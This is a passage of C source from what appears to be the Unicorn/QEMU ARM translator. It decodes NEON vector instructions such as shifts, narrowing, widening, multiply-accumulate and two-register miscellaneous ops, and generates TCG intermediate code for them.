tcg_temp_free_i32(tcg_ctx, tmp3); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); /* Save the result. For elementwise operations we can put it straight into the destination register. For pairwise operations we have to be careful to avoid clobbering the source operands. */ if (pairwise && rd == rm) { neon_store_scratch(tcg_ctx, pass, tmp); } else { neon_store_reg(tcg_ctx, rd, pass, tmp); } } /* for pass */ if (pairwise && rd == rm) { for (pass = 0; pass < (q ? 4 : 2); pass++) { tmp = neon_load_scratch(tcg_ctx, pass); neon_store_reg(tcg_ctx, rd, pass, tmp); } } /* End of 3 register same size operations. */ } else if (insn & (1 << 4)) { if ((insn & 0x00380080) != 0) { /* Two registers and shift. */ op = (insn >> 8) & 0xf; if (insn & (1 << 7)) { /* 64-bit shift. */ if (op > 7) { return 1; } size = 3; } else { size = 2; while ((insn & (1 << (size + 19))) == 0) size--; } shift = (insn >> 16) & ((1 << (3 + size)) - 1); if (op < 8) { /* Shift by immediate: VSHR, VSRA, VRSHR, VRSRA, VSRI, VSHL, VQSHL, VQSHLU. */ if (q && ((rd | rm) & 1)) { return 1; } if (!u && (op == 4 || op == 6)) { return 1; } /* Right shifts are encoded as N - shift, where N is the element size in bits. */ if (op <= 4) { shift = shift - (1 << (size + 3)); } switch (op) { case 0: /* VSHR */ /* Right shift comes here negative. */ shift = -shift; /* Shifts larger than the element size are architecturally * valid. Unsigned results in all zeros; signed results * in all sign bits. */ if (!u) { tcg_gen_gvec_sari(tcg_ctx, size, rd_ofs, rm_ofs, MIN(shift, (8 << size) - 1), vec_size, vec_size); } else if (shift >= 8 << size) { tcg_gen_gvec_dup8i(tcg_ctx, rd_ofs, vec_size, vec_size, 0); } else { tcg_gen_gvec_shri(tcg_ctx, size, rd_ofs, rm_ofs, shift, vec_size, vec_size); } return 0; case 1: /* VSRA */ /* Right shift comes here negative. */ shift = -shift; /* Shifts larger than the element size are architecturally * valid. Unsigned results in all zeros; signed results * in all sign bits. */ if (!u) { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, MIN(shift, (8 << size) - 1), &ssra_op[size]); } else if (shift >= 8 << size) { /* rd += 0 */ } else { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, shift, &usra_op[size]); } return 0; case 4: /* VSRI */ if (!u) { return 1; } /* Right shift comes here negative. */ shift = -shift; /* Shift out of range leaves destination unchanged. */ if (shift < 8 << size) { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, shift, &sri_op[size]); } return 0; case 5: /* VSHL, VSLI */ if (u) { /* VSLI */ /* Shift out of range leaves destination unchanged. */ if (shift < 8 << size) { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, shift, &sli_op[size]); } } else { /* VSHL */ /* Shifts larger than the element size are * architecturally valid and results in zero. */ if (shift >= 8 << size) { tcg_gen_gvec_dup8i(tcg_ctx, rd_ofs, vec_size, vec_size, 0); } else { tcg_gen_gvec_shli(tcg_ctx, size, rd_ofs, rm_ofs, shift, vec_size, vec_size); } } return 0; } if (size == 3) { count = q + 1; } else { count = q ? 4: 2; } /* To avoid excessive duplication of ops we implement shift * by immediate using the variable shift operations. */ imm = dup_const(size, shift); for (pass = 0; pass < count; pass++) { if (size == 3) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_V1, imm); switch (op) { case 2: /* VRSHR */ case 3: /* VRSRA */ if (u) gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); else gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); break; case 6: /* VQSHLU */ gen_helper_neon_qshlu_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); break; case 7: /* VQSHL */ if (u) { gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } else { gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } break; default: g_assert_not_reached(); break; } if (op == 3) { /* Accumulate. */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } else { /* size < 3 */ /* Operands in T0 and T1. */ tmp = neon_load_reg(tcg_ctx, rm, pass); tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp2, imm); switch (op) { case 2: /* VRSHR */ case 3: /* VRSRA */ GEN_NEON_INTEGER_OP(rshl); break; case 6: /* VQSHLU */ switch (size) { case 0: gen_helper_neon_qshlu_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 1: gen_helper_neon_qshlu_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 2: gen_helper_neon_qshlu_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; default: abort(); } break; case 7: /* VQSHL */ GEN_NEON_INTEGER_OP_ENV(qshl); break; default: g_assert_not_reached(); break; } tcg_temp_free_i32(tcg_ctx, tmp2); if (op == 3) { /* Accumulate. */ tmp2 = neon_load_reg(tcg_ctx, rd, pass); gen_neon_add(tcg_ctx, size, tmp, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); } neon_store_reg(tcg_ctx, rd, pass, tmp); } } /* for pass */ } else if (op < 10) { /* Shift by immediate and narrow: VSHRN, VRSHRN, VQSHRN, VQRSHRN. */ int input_unsigned = (op == 8) ? !u : u; if (rm & 1) { return 1; } shift = shift - (1 << (size + 3)); size++; if (size == 3) { tmp64 = tcg_const_i64(tcg_ctx, shift); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); for (pass = 0; pass < 2; pass++) { TCGv_i64 in; if (pass == 0) { in = tcg_ctx->cpu_V0; } else { in = tcg_ctx->cpu_V1; } if (q) { if (input_unsigned) { gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } else { gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } } else { if (input_unsigned) { gen_ushl_i64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } else { gen_sshl_i64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } } tmp = tcg_temp_new_i32(tcg_ctx); gen_neon_narrow_op(tcg_ctx, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); neon_store_reg(tcg_ctx, rd, pass, tmp); } /* for pass */ tcg_temp_free_i64(tcg_ctx, tmp64); } else { if (size == 1) { imm = (uint16_t)shift; imm |= imm << 16; } else { /* size == 2 */ imm = (uint32_t)shift; } tmp2 = tcg_const_i32(tcg_ctx, imm); tmp4 = neon_load_reg(tcg_ctx, rm + 1, 0); tmp5 = neon_load_reg(tcg_ctx, rm + 1, 1); for (pass = 0; pass < 2; pass++) { if (pass == 0) { tmp = neon_load_reg(tcg_ctx, rm, 0); } else { tmp = tmp4; } gen_neon_shift_narrow(tcg_ctx, size, tmp, tmp2, q, input_unsigned); if (pass == 0) { tmp3 = neon_load_reg(tcg_ctx, rm, 1); } else { tmp3 = tmp5; } gen_neon_shift_narrow(tcg_ctx, size, tmp3, tmp2, q, input_unsigned); tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp3); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, tmp3); tmp = tcg_temp_new_i32(tcg_ctx); gen_neon_narrow_op(tcg_ctx, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); neon_store_reg(tcg_ctx, rd, pass, tmp); } /* for pass */ tcg_temp_free_i32(tcg_ctx, tmp2); } } else if (op == 10) { /* VSHLL, VMOVL */ if (q || (rd & 1)) { return 1; } tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); for (pass = 0; pass < 2; pass++) { if (pass == 1) tmp = tmp2; gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, u); if (shift != 0) { /* The shift is less than the width of the source type, so we can just shift the whole register. */ tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, shift); /* Widen the result of shift: we need to clear * the potential overflow bits resulting from * left bits of the narrow input appearing as * right bits of left the neighbour narrow * input. */ if (size < 2 || !u) { uint64_t imm64; if (size == 0) { imm = (0xffu >> (8 - shift)); imm |= imm << 16; } else if (size == 1) { imm = 0xffff >> (16 - shift); } else { /* size == 2 */ imm = 0xffffffff >> (32 - shift); } if (size < 2) { imm64 = imm | (((uint64_t)imm) << 32); } else { imm64 = imm; } tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, ~imm64); } } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } } else if (op >= 14) { /* VCVT fixed-point. */ TCGv_ptr fpst; TCGv_i32 shiftv; VFPGenFixPointFn *fn; if (!(insn & (1 << 21)) || (q && ((rd | rm) & 1))) { return 1; } if (!(op & 1)) { if (u) { fn = gen_helper_vfp_ultos; } else { fn = gen_helper_vfp_sltos; } } else { if (u) { fn = gen_helper_vfp_touls_round_to_zero; } else { fn = gen_helper_vfp_tosls_round_to_zero; } } /* We have already masked out the must-be-1 top bit of imm6, * hence this 32-shift where the ARM ARM has 64-imm6. */ shift = 32 - shift; fpst = get_fpstatus_ptr(tcg_ctx, 1); shiftv = tcg_const_i32(tcg_ctx, shift); for (pass = 0; pass < (q ? 4 : 2); pass++) { TCGv_i32 tmpf = neon_load_reg(tcg_ctx, rm, pass); fn(tcg_ctx, tmpf, tmpf, shiftv, fpst); neon_store_reg(tcg_ctx, rd, pass, tmpf); } tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, shiftv); } else { return 1; } } else { /* (insn & 0x00380080) == 0 */ int invert, reg_ofs, vec_size; if (q && (rd & 1)) { return 1; } op = (insn >> 8) & 0xf; /* One register and immediate. */ imm = (u << 7) | ((insn >> 12) & 0x70) | (insn & 0xf); invert = (insn & (1 << 5)) != 0; /* Note that op = 2,3,4,5,6,7,10,11,12,13 imm=0 is UNPREDICTABLE. * We choose to not special-case this and will behave as if a * valid constant encoding of 0 had been given. */ switch (op) { case 0: case 1: /* no-op */ break; case 2: case 3: imm <<= 8; break; case 4: case 5: imm <<= 16; break; case 6: case 7: imm <<= 24; break; case 8: case 9: imm |= imm << 16; break; case 10: case 11: imm = (imm << 8) | (imm << 24); break; case 12: imm = (imm << 8) | 0xff; break; case 13: imm = (imm << 16) | 0xffff; break; case 14: imm |= (imm << 8) | (imm << 16) | (imm << 24); if (invert) { imm = ~imm; } break; case 15: if (invert) { return 1; } imm = ((imm & 0x80) << 24) | ((imm & 0x3f) << 19) | ((imm & 0x40) ? (0x1f << 25) : (1 << 30)); break; } if (invert) { imm = ~imm; } reg_ofs = neon_reg_offset(rd, 0); vec_size = q ? 16 : 8; if (op & 1 && op < 12) { if (invert) { /* The immediate value has already been inverted, * so BIC becomes AND. */ tcg_gen_gvec_andi(tcg_ctx, MO_32, reg_ofs, reg_ofs, imm, vec_size, vec_size); } else { tcg_gen_gvec_ori(tcg_ctx, MO_32, reg_ofs, reg_ofs, imm, vec_size, vec_size); } } else { /* VMOV, VMVN. */ if (op == 14 && invert) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass <= q; ++pass) { uint64_t val = 0; int n; for (n = 0; n < 8; n++) { if (imm & (1 << (n + pass * 8))) { val |= 0xffull << (n * 8); } } tcg_gen_movi_i64(tcg_ctx, t64, val); neon_store_reg64(tcg_ctx, t64, rd + pass); } tcg_temp_free_i64(tcg_ctx, t64); } else { tcg_gen_gvec_dup32i(tcg_ctx, reg_ofs, vec_size, vec_size, imm); } } } } else { /* (insn & 0x00800010 == 0x00800000) */ if (size != 3) { op = (insn >> 8) & 0xf; if ((insn & (1 << 6)) == 0) { /* Three registers of different lengths. */ int src1_wide; int src2_wide; int prewiden; /* undefreq: bit 0 : UNDEF if size == 0 * bit 1 : UNDEF if size == 1 * bit 2 : UNDEF if size == 2 * bit 3 : UNDEF if U == 1 * Note that [2:0] set implies 'always UNDEF' */ int undefreq; /* prewiden, src1_wide, src2_wide, undefreq */ static const int neon_3reg_wide[16][4] = { {1, 0, 0, 0}, /* VADDL */ {1, 1, 0, 0}, /* VADDW */ {1, 0, 0, 0}, /* VSUBL */ {1, 1, 0, 0}, /* VSUBW */ {0, 1, 1, 0}, /* VADDHN */ {0, 0, 0, 0}, /* VABAL */ {0, 1, 1, 0}, /* VSUBHN */ {0, 0, 0, 0}, /* VABDL */ {0, 0, 0, 0}, /* VMLAL */ {0, 0, 0, 9}, /* VQDMLAL */ {0, 0, 0, 0}, /* VMLSL */ {0, 0, 0, 9}, /* VQDMLSL */ {0, 0, 0, 0}, /* Integer VMULL */ {0, 0, 0, 1}, /* VQDMULL */ {0, 0, 0, 0xa}, /* Polynomial VMULL */ {0, 0, 0, 7}, /* Reserved: always UNDEF */ }; prewiden = neon_3reg_wide[op][0]; src1_wide = neon_3reg_wide[op][1]; src2_wide = neon_3reg_wide[op][2]; undefreq = neon_3reg_wide[op][3]; if ((undefreq & (1 << size)) || ((undefreq & 8) && u)) { return 1; } if ((src1_wide && (rn & 1)) || (src2_wide && (rm & 1)) || (!src2_wide && (rd & 1))) { return 1; } /* Handle polynomial VMULL in a single pass. */ if (op == 14) { if (size == 0) { /* VMULL.P8 */ tcg_gen_gvec_3_ool(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, 16, 16, 0, gen_helper_neon_pmull_h); } else { /* VMULL.P64 */ if (!dc_isar_feature(aa32_pmull, s)) { return 1; } tcg_gen_gvec_3_ool(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, 16, 16, 0, gen_helper_gvec_pmull_q); } return 0; } /* Avoid overlapping operands. Wide source operands are always aligned so will never overlap with wide destinations in problematic ways. */ if (rd == rm && !src2_wide) { tmp = neon_load_reg(tcg_ctx, rm, 1); neon_store_scratch(tcg_ctx, 2, tmp); } else if (rd == rn && !src1_wide) { tmp = neon_load_reg(tcg_ctx, rn, 1); neon_store_scratch(tcg_ctx, 2, tmp); } tmp3 = NULL; for (pass = 0; pass < 2; pass++) { if (src1_wide) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); tmp = NULL; } else { if (pass == 1 && rd == rn) { tmp = neon_load_scratch(tcg_ctx, 2); } else { tmp = neon_load_reg(tcg_ctx, rn, pass); } if (prewiden) { gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, u); } } if (src2_wide) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); tmp2 = NULL; } else { if (pass == 1 && rd == rm) { tmp2 = neon_load_scratch(tcg_ctx, 2); } else { tmp2 = neon_load_reg(tcg_ctx, rm, pass); } if (prewiden) { gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V1, tmp2, size, u); } } switch (op) { case 0: case 1: case 4: /* VADDL, VADDW, VADDHN, VRADDHN */ gen_neon_addl(tcg_ctx, size); break; case 2: case 3: case 6: /* VSUBL, VSUBW, VSUBHN, VRSUBHN */ gen_neon_subl(tcg_ctx, size); break; case 5: case 7: /* VABAL, VABDL */ switch ((size << 1) | u) { case 0: gen_helper_neon_abdl_s16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 1: gen_helper_neon_abdl_u16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 2: gen_helper_neon_abdl_s32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 3: gen_helper_neon_abdl_u32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 4: gen_helper_neon_abdl_s64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 5: gen_helper_neon_abdl_u64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); break; case 8: case 9: case 10: case 11: case 12: case 13: /* VMLAL, VQDMLAL, VMLSL, VQDMLSL, VMULL, VQDMULL */ gen_neon_mull(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2, size, u); break; default: /* 15 is RESERVED: caught earlier */ abort(); } if (op == 13) { /* VQDMULL */ gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } else if (op == 5 || (op >= 8 && op <= 11)) { /* Accumulate. */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); switch (op) { case 10: /* VMLSL */ gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); /* Fall through */ case 5: case 8: /* VABAL, VMLAL */ gen_neon_addl(tcg_ctx, size); break; case 9: case 11: /* VQDMLAL, VQDMLSL */ gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); if (op == 11) { gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); } gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); break; default: abort(); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } else if (op == 4 || op == 6) { /* Narrowing operation. */ tmp = tcg_temp_new_i32(tcg_ctx); if (!u) { switch (size) { case 0: gen_helper_neon_narrow_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 1: gen_helper_neon_narrow_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 2: tcg_gen_extrh_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; default: abort(); } } else { switch (size) { case 0: gen_helper_neon_narrow_round_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 1: gen_helper_neon_narrow_round_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 2: tcg_gen_addi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 1u << 31); tcg_gen_extrh_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; default: abort(); } } if (pass == 0) { tmp3 = tmp; } else { neon_store_reg(tcg_ctx, rd, 0, tmp3); neon_store_reg(tcg_ctx, rd, 1, tmp); } } else { /* Write back the result. */ neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } } } else { /* Two registers and a scalar. NB that for ops of this form * the ARM ARM labels bit 24 as Q, but it is in our variable * 'u', not 'q'. */ if (size == 0) { return 1; } switch (op) { case 1: /* Float VMLA scalar */ case 5: /* Floating point VMLS scalar */ case 9: /* Floating point VMUL scalar */ if (size == 1) { return 1; } /* fall through */ case 0: /* Integer VMLA scalar */ case 4: /* Integer VMLS scalar */ case 8: /* Integer VMUL scalar */ case 12: /* VQDMULH scalar */ case 13: /* VQRDMULH scalar */ if (u && ((rd | rn) & 1)) { return 1; } tmp = neon_get_scalar(tcg_ctx, size, rm); neon_store_scratch(tcg_ctx, 0, tmp); for (pass = 0; pass < (u ? 4 : 2); pass++) { tmp = neon_load_scratch(tcg_ctx, 0); tmp2 = neon_load_reg(tcg_ctx, rn, pass); if (op == 12) { if (size == 1) { gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } else { gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } } else if (op == 13) { if (size == 1) { gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } else { gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } } else if (op & 1) { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); } else { switch (size) { case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } } tcg_temp_free_i32(tcg_ctx, tmp2); if (op < 8) { /* Accumulate. */ tmp2 = neon_load_reg(tcg_ctx, rd, pass); switch (op) { case 0: gen_neon_add(tcg_ctx, size, tmp, tmp2); break; case 1: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case 4: gen_neon_rsb(tcg_ctx, size, tmp, tmp2); break; case 5: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); } neon_store_reg(tcg_ctx, rd, pass, tmp); } break; case 3: /* VQDMLAL scalar */ case 7: /* VQDMLSL scalar */ case 11: /* VQDMULL scalar */ if (u == 1) { return 1; } /* fall through */ case 2: /* VMLAL sclar */ case 6: /* VMLSL scalar */ case 10: /* VMULL scalar */ if (rd & 1) { return 1; } tmp2 = neon_get_scalar(tcg_ctx, size, rm); /* We need a copy of tmp2 because gen_neon_mull * deletes it during pass 0. */ tmp4 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp4, tmp2); tmp3 = neon_load_reg(tcg_ctx, rn, 1); for (pass = 0; pass < 2; pass++) { if (pass == 0) { tmp = neon_load_reg(tcg_ctx, rn, 0); } else { tmp = tmp3; tmp2 = tmp4; } gen_neon_mull(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2, size, u); if (op != 11) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); } switch (op) { case 6: gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); /* Fall through */ case 2: gen_neon_addl(tcg_ctx, size); break; case 3: case 7: gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); if (op == 7) { gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); } gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); break; case 10: /* no-op */ break; case 11: gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); break; default: abort(); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } break; case 14: /* VQRDMLAH scalar */ case 15: /* VQRDMLSH scalar */ { NeonGenThreeOpEnvFn *fn; if (!dc_isar_feature(aa32_rdm, s)) { return 1; } if (u && ((rd | rn) & 1)) { return 1; } if (op == 14) { if (size == 1) { fn = gen_helper_neon_qrdmlah_s16; } else { fn = gen_helper_neon_qrdmlah_s32; } } else { if (size == 1) { fn = gen_helper_neon_qrdmlsh_s16; } else { fn = gen_helper_neon_qrdmlsh_s32; } } tmp2 = neon_get_scalar(tcg_ctx, size, rm); for (pass = 0; pass < (u ? 4 : 2); pass++) { tmp = neon_load_reg(tcg_ctx, rn, pass); tmp3 = neon_load_reg(tcg_ctx, rd, pass); fn(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2, tmp3); tcg_temp_free_i32(tcg_ctx, tmp3); neon_store_reg(tcg_ctx, rd, pass, tmp); } tcg_temp_free_i32(tcg_ctx, tmp2); } break; default: g_assert_not_reached(); break; } } } else { /* size == 3 */ if (!u) { /* Extract. */ imm = (insn >> 8) & 0xf; if (imm > 7 && !q) return 1; if (q && ((rd | rn | rm) & 1)) { return 1; } if (imm == 0) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); if (q) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rn + 1); } } else if (imm == 8) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); if (q) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); } } else if (q) { tmp64 = tcg_temp_new_i64(tcg_ctx); if (imm < 8) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); neon_load_reg64(tcg_ctx, tmp64, rn + 1); } else { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); neon_load_reg64(tcg_ctx, tmp64, rm); } tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, (imm & 7) * 8); tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tmp64, 64 - ((imm & 7) * 8)); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); if (imm < 8) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); } else { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); imm -= 8; } tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, imm * 8); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, tmp64); tcg_temp_free_i64(tcg_ctx, tmp64); } else { /* BUGFIX */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, imm * 8); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd); if (q) { neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + 1); } } else if ((insn & (1 << 11)) == 0) { /* Two register misc. */ op = ((insn >> 12) & 0x30) | ((insn >> 7) & 0xf); size = (insn >> 18) & 3; /* UNDEF for unknown op values and bad op-size combinations */ if ((neon_2rm_sizes[op] & (1 << size)) == 0) { return 1; } if (neon_2rm_is_v8_op(op) && !arm_dc_feature(s, ARM_FEATURE_V8)) { return 1; } if ((op != NEON_2RM_VMOVN && op != NEON_2RM_VQMOVN) && q && ((rm | rd) & 1)) { return 1; } switch (op) { case NEON_2RM_VREV64: for (pass = 0; pass < (q ? 2 : 1); pass++) { tmp = neon_load_reg(tcg_ctx, rm, pass * 2); tmp2 = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); switch (size) { case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; case 1: gen_swap_half(tcg_ctx, tmp); break; case 2: /* no-op */ break; default: abort(); } neon_store_reg(tcg_ctx, rd, pass * 2 + 1, tmp); if (size == 2) { neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); } else { switch (size) { case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp2, tmp2); break; case 1: gen_swap_half(tcg_ctx, tmp2); break; default: abort(); } neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); } } break; case NEON_2RM_VPADDL: case NEON_2RM_VPADDL_U: case NEON_2RM_VPADAL: case NEON_2RM_VPADAL_U: for (pass = 0; pass < q + 1; pass++) { tmp = neon_load_reg(tcg_ctx, rm, pass * 2); gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, op & 1); tmp = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V1, tmp, size, op & 1); switch (size) { case 0: gen_helper_neon_paddl_u16(tcg_ctx, CPU_V001); break; case 1: gen_helper_neon_paddl_u32(tcg_ctx, CPU_V001); break; case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break; default: abort(); } if (op >= NEON_2RM_VPADAL) { /* Accumulate. */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); gen_neon_addl(tcg_ctx, size); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } break; case NEON_2RM_VTRN: if (size == 2) { int n; for (n = 0; n < (q ? 4 : 2); n += 2) { tmp = neon_load_reg(tcg_ctx, rm, n); tmp2 = neon_load_reg(tcg_ctx, rd, n + 1); neon_store_reg(tcg_ctx, rm, n, tmp2); neon_store_reg(tcg_ctx, rd, n + 1, tmp); } } else { goto elementwise; } break; case NEON_2RM_VUZP: if (gen_neon_unzip(tcg_ctx, rd, rm, size, q)) { return 1; } break; case NEON_2RM_VZIP: if (gen_neon_zip(tcg_ctx, rd, rm, size, q)) { return 1; } break; case NEON_2RM_VMOVN: case NEON_2RM_VQMOVN: /* 